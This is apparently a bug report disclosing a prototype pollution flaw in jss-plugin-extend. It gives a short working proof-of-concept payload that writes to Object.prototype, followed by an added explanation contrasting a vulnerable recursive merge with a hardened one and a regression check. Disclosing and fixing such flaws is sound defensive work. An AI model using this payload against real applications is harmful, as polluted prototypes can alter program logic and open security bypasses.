Prototype Pollution in the plugin jss-plugin-extend #1673

@cstimkong

Expected behavior:
The prototype object Object.prototype should not be modified.

Describe the bug:
There is a prototype pollution vulnerability in the plugin jss-plugin-extend.

Reproduction:

Using the following exploit:

var jss = require('jss');
var extend = require('jss-plugin-extend');

var s = jss.create()
  .use(extend.default())
  .createStyleSheet(
  {extend: {extend: {constructor: {prototype: {polluted: 'yes'}}}}}
  );
console.log(Object.prototype.polluted === 'yes')

Versions (please complete the following information):

  • jss: 10.10.0 (newest)
  • OS [Linux, macOS, Windows]:
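The following is an added example, not part of the original report and not the plugin's own source. It shows why a payload shaped like the one above reaches `Object.prototype` through a recursive merge, next to a hardened merge that refuses the walk; `naiveMerge`, `safeMerge` and `pollutes` are hypothetical names and the merge is a simplified stand-in.

```javascript
'use strict';

// Keys that let a merge walk from a plain object up to Object.prototype.
const BLOCKED_KEYS = new Set(['__proto__', 'constructor', 'prototype']);

const isPlainObject = (v) =>
  v !== null && typeof v === 'object' && !Array.isArray(v);

// Simplified stand-in for a recursive style merge (assumption, not the
// plugin's code). `key in target` is true for inherited members, so
// "constructor" resolves to Object and "prototype" to Object.prototype.
function naiveMerge(target, source) {
  for (const key of Object.keys(source)) {
    if (isPlainObject(source[key])) {
      if (!(key in target)) target[key] = {};
      naiveMerge(target[key], source[key]);
    } else {
      target[key] = source[key];
    }
  }
  return target;
}

// Hardened form: skip blocked keys, and only descend into own properties
// of the target that are themselves plain objects.
function safeMerge(target, source) {
  for (const key of Object.keys(source)) {
    if (BLOCKED_KEYS.has(key)) continue;
    const value = source[key];
    if (isPlainObject(value)) {
      const own = Object.prototype.hasOwnProperty.call(target, key);
      if (!own || !isPlainObject(target[key])) target[key] = {};
      safeMerge(target[key], value);
    } else {
      target[key] = value;
    }
  }
  return target;
}

// Runs a merge on the inner payload shape from the report and says whether
// Object.prototype gained a property; removes the property afterwards.
function pollutes(mergeFn) {
  const payload = {constructor: {prototype: {polluted: 'yes'}}, color: 'red'};
  mergeFn({}, payload);
  const hit = Object.prototype.hasOwnProperty.call(Object.prototype, 'polluted');
  delete Object.prototype.polluted;
  return hit;
}
```

`pollutes(naiveMerge)` returns `true` and `pollutes(safeMerge)` returns `false`; the same `pollutes` check can serve as a regression test for any merge routine that accepts untrusted style objects.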
